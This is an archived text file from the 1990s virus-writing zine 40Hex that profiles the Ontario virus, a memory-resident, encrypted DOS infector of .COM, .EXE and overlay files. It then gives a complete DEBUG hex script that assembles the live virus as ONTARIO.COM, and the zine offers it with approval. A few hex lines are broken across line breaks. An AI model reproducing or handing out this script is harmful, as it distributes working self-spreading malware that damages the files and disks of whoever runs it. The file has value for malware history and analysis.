home *** CD-ROM | disk | FTP | other *** search
/ Hacker 2 / HACKER2.mdf / virus / 40hex_2.008 < prev    next >
Text File  |  1995-01-03  |  5KB  |  102 lines
  1. 40hEX vOLUME 1 iSSUE 2                                                   0008
  2.  
  3.                            tHE oNTARIO vIRUS
  4.  
  5.  
  6.       hERE A QUICK NICE LITTLE VIRUS FROM OUR BOYZ UP NORTH.
  7.  
  8.  v sTATUS:    rARE
  9.  dISCOVERED:  jULY, 1990
  10.  sYMPTOMS:    .com & .exe GROWTH; DECREASE IN SYSTEM AND FREE MEMORY;
  11.               HARD DISK ERRORS IN THE CASE OF EXTREME INFECTIONS
  12.  oRIGIN:      oNTARIO, cANADA
  13.  eFF lENGTH:  512 bYTES
  14.  tYPE cODE:   prTak - pARASITIC eNCRYPTED rESIDENT .com & .exe iNFECTOR
  15.  dETECTION mETHOD:  vIRUsCAN v66+, pRO-sCAN 2.01+, nav
  16.  rEMOVAL iNSTRUCTIONS:  scan /d, OR dELETE INFECTED FILES
  17.  gENERAL cOMMENTS:
  18.        tHE oNTARIO vIRUS WAS ISOLATED BY mIKE sHIELDS
  19.  IN oNTARIO, cANADA
  20.        IN jULY, 1990.  tHE oNTARIO VIRUS IS A MEMORY RESIDENT INFECTOR OF
  21.        .com, .exe, AND OVERLAY FILES.  iT WILL INFECT command.com.
  22.  
  23.        tHE FIRST TIME A PROGRAM INFECTED WITH THE oNTARIO vIRUS IS EXECUTED,
  24.        IT WILL INSTALL ITSELF MEMORY RESIDENT ABOVE THE TOP OF SYSTEM MEMORY
  25.        BUT BELOW THE 640k dos BOUNDARY.  tOTAL SYSTEM MEMORY AND FREE MEMORY
  26.        WILL BE DECREASED BY 2,048 BYTES.  aT THIS TIME, THE VIRUS WILL
  27.        INFECT command.com ON THE c: DRIVE, INCREASING ITS LENGTH BY 512 BYTES.
  28.  
  29.        eACH TIME AN UNINFECTED PROGRAM IS EXECUTED ON THE SYSTEM WITH THE
  30.        VIRUS MEMORY RESIDENT, THE PROGRAM WILL BECOME INFECTED WITH THE VIRAL
  31.        CODE LOCATED AT THE END OF THE FILE.  fOR .com FILES, THEY WILL
  32.        INCREASE BY 512 BYTES IN ALL CASES.  fOR .exe AND OVERLAY FILES, THE
  33.        FILE LENGTH INCREASE WILL BE 512 - 1023 BYTES.  tHE DIFFERENCE IN
  34.        LENGTH FOR .exe AND OVERLAY FILES IS BECAUSE THE VIRUS WILL FILL OUT
  35.        T
  36. HE UNUSED SPACE AT THE END OF THE LAST SECTOR OF THE UNINFECTED FILE
  37.        WITH RANDOM DATA (USUALLY A PORTION OF THE DIRECTORY) AND THEN APPEND
  38.        ITSELF TO THE END OF THE FILE AT THE NEXT SECTOR.  sYSTEMS USING
  39.        A SECTOR SIZE OF MORE THAN 512 BYTES MAY NOTICE LARGER FILE INCREASES
  40.        FOR INFECTED FILES.  iNFECTED FILES WILL ALWAYS HAVE A FILE LENGTH
  41.        THAT IS A MULTIPLE OF THE SECTOR SIZE ON THE DISK.
  42.  
  43.        iN THE CASE OF EXTREME INFECTIONS OF THE oNTARIO vIRUS, HARD DISK
  44.        ERRORS MAY BE NOTICED.
  45.  
  46.        oNTARIO USES A COMPLEX ENCRYPTION ROUTINE, AND A SIMPLE IDENTIFICATION
  47.        STRING WILL NOT IDENTIFY THIS VIRUS.
  48.  
  49.  
  50. ------------------------------------------------------------------------------
  51.  
  52. N ONTARIO.COM
  53. E 0100  e9 1d 00 1d 66 65 63 74 65 64 20 50 72 6f 67 72
  54. E 0110  61 6d 2e 20 0d 0a 24 ba 02 01 b4 09 cd 21 cd 20
  55. E 0120  90 e8 e9 01 93 84 7b d9 f8 69 7c 3c 84 7b b6 a5
  56. E 0130  71 60 0f cb 65 b7 bb 0a a3 07 55 97 7f 86 be 9a
  57. E 0140  ff 84 55 0d e5 84
  58. 79 aa f7 1a 79 86 f7 47 30 0a
  59. E 0150  a0 05 55 87 7b 04 7b 25 69 84 56 04 7b 27 69 84
  60. E 0160  f5 44 75 9b f0 71 48 7b c2 80 79 78 88 20 f5 5d
  61. E 0170  81 43 7d 00 7b fb 7b 27 fd 84 80 3c 84 cf b6 a5
  62. E 0180  64 9a 7c 8f 96 f0 77 09 cd ff 7b 3b 7b 85 2c 78
  63. E 0190  de 21 b8 08 bb aa 7a 82 06 84 91 6f 6e cd 15 b9
  64. E 01a0  84 7b 0e 86 3b 4b fb 78 30 f1 6f b8 78 f0 6b b8
  65. E 01b0  84 f1 72 8a 64 3e a6 85 93 8d 7b 4b 93 81 7b aa
  66. E 01c0  84 aa 7b 86 7d 9a 29 d5 28 d4 c3 84 38 6c 5d 85
  67. E 01d0  09 9c 8d 45 7a f0 70 04 9a 7a c3 85 38 6c 6d 85
  68. E 01e0  09 8c c3 86 46 6c 75 85 08 87 92 86 7a 0f a3 8a
  69. E 01f0  64 3c 7b d3 93 7b 7b 0d 75 80 79 0d 6d 82 79 3e
  70. E 0200  73 86 c2 9f 7b 30 44 6c 97 84 09 cc fa ba 73 86
  71. E 0210  36 de 0f bd db 8d 79 be 7d 8f 79 f0 4c b7 a9 b7
  72. E 0220  b2 3c 79 c6 93 4b 7b f6 50 b9 7b 64 0c a2 2b 25
  73. E 0230  73 86 d8 ff 7b 25 71 86 d8 f9 7b dc 56 87 7b 42
  74. E 0240  7d 8c 79 6d d8 8d 79 26 70 86 90 cd eb 07 45 98
  75. E 0250  79 85 0e 87 92 01 7b 25 77 86 c2 84 79 73 9a d4
  76. E 0260  29 35 7f 5
  77. 7 b1 57 93 87 b9 af 7d 94 79 d4 da 98
  78. E 0270  79 27 00 84 da 9a 79 81 6b 84 d8 f9 7b dc d8 9a
  79. E 0280  79 43 7d 98 79 85 7b 7b 7d 88 79 dd 21 3c 7b c6
  80. E 0290  93 e7 7b f6 3c 04 4d 7c 7a 8c 48 44 f5 5c db e8
  81. E 02a0  7f 8a 64 8a 7c 26 97 85 48 72 c4 a0 79 d3 c2 84
  82. E 02b0  79 78 88 20 c5 ac 79 6c 21 84 21 3d 7b 86 cf c4
  83. E 02c0  93 b7 7b f6 6c b7 b2 b7 a9 3c 7b c6 93 a3 7b f6
  84. E 02d0  70 3e 73 86 c2 9f 7b 30 3b 6c 61 84 f0 92 7d 86
  85. E 02e0  f0 8a 7f 86 c3 85 2c 6c 77 84 cf ba 93 83 7b dc
  86. E 02f0  20 dd 21 9b 7c 47 e7 aa 84 9a 7b 86 b8 c7 41 d8
  87. E 0300  38 cb 36 c9 3a ca 3f aa 38 cb 36 84 84 5e 56 2e
  88. E 0310  8a 84 e8 01 b9 e8 01 f6 d0 2e 30 04 46 e2 f8 c3
  89.  
  90. RCX
  91. 220
  92. W
  93. Q
  94.  
  95. ------------------------------------------------------------------------------
  96.  
  97.  
  98.  
  99.                                                                             hr
  100.  
  101. Downloaded From P-80 International Information Systems 304-744-2253
  102.